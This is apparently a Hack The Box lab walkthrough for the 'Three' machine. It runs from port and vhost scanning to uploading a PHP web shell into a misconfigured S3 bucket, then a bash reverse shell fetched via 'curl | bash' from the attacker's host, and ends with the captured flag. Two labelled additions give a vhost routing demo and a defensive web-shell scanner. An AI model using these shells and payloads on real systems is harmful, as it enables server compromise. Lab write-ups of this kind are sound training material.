root@htb:~$ sudo nmap -sV -T4 {targetIP} -p-
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
* Typically '-sV' is used with Nmap to determine versions, but that's not always enough.
- adding the -sC is another good way to determine service versions
- the -sC option will run safe scripts which are designed to provide useful
information without being too intrusive or causing harm to the target systems.
VULNERABILITY SCANNING
root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 22,80
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 17:8b:d4:25:45:2a:20:b8:79:f8:e2:58:d7:8e:79:f4 (RSA)
| 256 e6:0f:1a:f6:32:8a:40:ef:2d:a7:3b:22:d1:c7:14:fa (ECDSA)
|_ 256 2d:e1:87:41:75:f3:91:54:41:16:b7:2b:80:c6:8f:05 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Toppers
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
* the -sC option runs the default set of Nmap scripts (NSE scripts), which typically include
scripts for service enumeration, version detection, and other basic checks.
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 22,80
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.35.157
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.129.35.157:80/
| Form id:
|_ Form action: /action_page.php
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|_ /images/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
* the --script=vuln option runs scripts that focus specifically on detecting known
vulnerabilities in the services found on the scanned ports (22 and 80 here)
- e.g., weak configurations or known CVEs in the detected service versions
- if no results are found, the service may be fully patched (or no NSE script covers it)
FOOTHOLD
Submit root flag
#walk the application and identify potential entry points
root@htb:~$ BROWSER > {targetIP:port}
* identified domain as thetoppers.htb from the contact section
root@htb:~$ echo "10.129.35.157 thetoppers.htb" | sudo tee -a /etc/hosts
10.129.35.157 thetoppers.htb
root@htb:~$ BROWSER > http://thetoppers.htb
* possible vulnerable entry points
- buy tickets form
- contact web form
- could be vulnerable to XSS, etc
#subdomain enumeration
root@htb:~$ locate subdomains-top1million-5000.txt
/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
root@htb:~$ cp /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt .
root@htb:~$ which gobuster
/usr/bin/gobuster
root@htb:~$ gobuster vhost -u http://thetoppers.htb -w subdomains-top1million-5000.txt --append-domain
Found: s3.thetoppers.htb Status: 404 [Size: 21]
Found: gc._msdcs.thetoppers.htb Status: 400 [Size: 306]
Progress: 4989 / 4990 (99.98%)
* the vhost represents virtual host routing
* the -w represents the path to the wordlist
* the -u represents the target URL
* gobuster version 3.2.0 requires the --append-domain option to account for the known vHost
- Host: [word].thetoppers.htb
- the --append-domain option is only required when conducting subdomain enumeration NOT directory brute forcing
* typically, subdomains are assigned different IP addresses; however,
virtual host routing (aka host-based routing) could be configured where
one server having one IP address handles multiple subdomains
- with vhost, the server uses the Host header in the HTTP request to
determine which application is meant to handle the request instead
of having subdomains assigned to different IP addresses
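As an added illustration (not part of the original notes), this minimal Python server routes purely on the Host header, the way the single-IP Apache instance above serves both thetoppers.htb and s3.thetoppers.htb; the vhost table and the default response are constructed assumptions, and a name-based enumeration tool flags a Host value when its response differs from this default.

```python
"""Name-based (Host header) virtual host routing on a single IP address."""
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed vhost table: one server, one IP, several names (assumption).
VHOSTS = {
    "thetoppers.htb": (200, b"<html><title>The Toppers</title></html>"),
    "s3.thetoppers.htb": (200, b'{"status": "running"}'),
}
# What every unknown Host gets; this is the baseline a vhost brute-forcer diffs against.
DEFAULT = (404, b"no such virtual host\n")


def normalise_host(host_header):
    """Lower-case the Host value and drop an optional :port ([::1]:8080 stays intact)."""
    if not host_header:
        return ""
    host = host_header.strip().lower()
    if host.startswith("["):                 # IPv6 literal, e.g. [::1]:8080
        return host.split("]", 1)[0] + "]"
    return host.split(":", 1)[0]


def route(host_header):
    """Select the (status, body) for a request using only its Host header."""
    return VHOSTS.get(normalise_host(host_header), DEFAULT)


class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        status, body = route(self.headers.get("Host"))
        self.send_response(status)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


if __name__ == "__main__":
    # Try: curl -H "Host: s3.thetoppers.htb" http://127.0.0.1:8080/
    HTTPServer(("127.0.0.1", 8080), Handler).serve_forever()
```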
root@htb:~$ echo "10.129.35.157 s3.thetoppers.htb" | sudo tee -a /etc/hosts
10.129.35.157 s3.thetoppers.htb
root@htb:~$ BROWSER > s3.thetoppers.htb
{"status": "running"}
* AWS S3 bucket is a cloud-based object storage service that allows the storage
of files (aka objects) in containers called buckets.
- these can be used for backup & storage, media hosting, software delivery,
static website, etc
#install awscli
root@htb:~$ which awscli
root@htb:~$ apt install awscli
root@htb:~$ which aws
/usr/local/bin/aws
root@htb:~$ aws configure
AWS Access Key ID [None]: {null}
AWS Secret Access Key [None]: {null}
Default region name [None]: {null}
Default output format [None]: {null}
* {arbitrary values} can be used because the target server isn't properly configured: it doesn't check for authentication
#connection & enumeration
root@htb:~$ aws --endpoint=http://s3.thetoppers.htb s3 ls
* this cmd lists all S3 buckets hosted by the server
root@htb:~$ aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb
PRE images/
2025-02-21 21:53:28 0 .htaccess
2025-02-21 21:53:29 11952 index.php
* this cmd lists objects and common prefixes under the specified bucket
#exploitation
root@htb:~$ echo '<?php system($_GET["cmd"]); ?>' > shell.php
root@htb:~$ aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb
upload: ./shell.php to s3://thetoppers.htb/shell.php
* this cmd uploads the php shell to the target's s3 bucket
#RCE
root@htb:~$ curl http://thetoppers.htb/shell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
* this is a non-interactive shell as it runs a single command per request
and returns the result. there's no back-and-forth, ongoing interaction
like in a terminal or shell.
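Defender-side counterpart, added here and not part of the original walkthrough: a small Python scanner that walks a web root and flags PHP files where a request parameter flows into a command-execution sink, which is exactly the pattern of the uploaded shell.php. The sink and source lists and the sample files are constructed assumptions, not an exhaustive rule set.

```python
import re
import tempfile
from pathlib import Path

# Constructed, non-exhaustive lists: PHP command/code-execution sinks and
# request-controlled superglobals (the uploaded shell.php uses system + $_GET).
SINKS = r"(?<![\w$])(?:system|exec|shell_exec|passthru|popen|proc_open|eval|assert)"
SOURCES = r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\b"
# sink( ... $_GET ... ) within one statement, and backtick shell operators `... $_GET ...`
SINK_WITH_SOURCE = re.compile(SINKS + r"\s*\(\s*[^;]*?" + SOURCES)
BACKTICK_WITH_SOURCE = re.compile(r"`[^`]*" + SOURCES + r"[^`]*`")


def scan_source(text):
    """Return sorted (line_no, snippet) pairs for each request-to-exec flow found."""
    findings = []
    for pattern in (SINK_WITH_SOURCE, BACKTICK_WITH_SOURCE):
        for m in pattern.finditer(text):
            line_no = text.count("\n", 0, m.start()) + 1
            findings.append((line_no, m.group(0).strip()))
    return sorted(findings)


def scan_tree(root):
    """Scan every PHP file below root (e.g. /var/www/html); returns {path: findings}."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in (".php", ".phtml", ".phar"):
            findings = scan_source(path.read_text(errors="replace"))
            if findings:
                hits[str(path)] = findings
    return hits


def demo():
    """Constructed web root: the page's shell.php next to a benign index.php."""
    with tempfile.TemporaryDirectory() as root:
        Path(root, "shell.php").write_text('<?php system($_GET["cmd"]); ?>\n')
        Path(root, "index.php").write_text(
            '<?php echo htmlspecialchars($_GET["q"] ?? ""); ?>\n')
        return {Path(p).name: f for p, f in scan_tree(root).items()}


if __name__ == "__main__":
    for name, findings in demo().items():
        print(name, findings)
```

Because the bucket contents are served straight from the web root, any file written to the bucket becomes executable PHP; running a scan like this on a schedule, or alerting on new .php objects in the bucket, catches the upload step rather than the later curl.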
#REVERSE SHELL
root@htb:~$ ifconfig
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.10.14.215 netmask 255.255.254.0 destination 10.10.14.215
root@htb:~$ nano revShell.sh
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.215/1337 0>&1
root@htb:~$ nc -nlvp 1337
* this is an interactive shell where it keeps the connection open, allowing
for multiple commands to be sent and results to be returned in a more
dynamic way
root@htb:~$ python3 -m http.server 8000
#URL encode the payload
root@htb:~$ cyberchef.io
input: http://thetoppers.htb/shell.php?cmd=curl 10.10.14.215:8000/revShell.sh | bash
recipe: URL encode
output: http://thetoppers.htb/shell.php?cmd=curl%2010.10.14.215:8000/revShell.sh%20%7C%20bash
root@htb:~$ curl http://thetoppers.htb/shell.php?cmd=curl%2010.10.14.215:8000/revShell.sh%20%7C%20bash
* since the reverse shell is a bash script, it must be piped to bash
in order to execute it
www-data@three:/var/www/html$ locate flag.txt
/var/www/flag.txt
www-data@three:/var/www/html$ cat ../flag.txt
a980d99281a28d638ac68b9bf9453c2b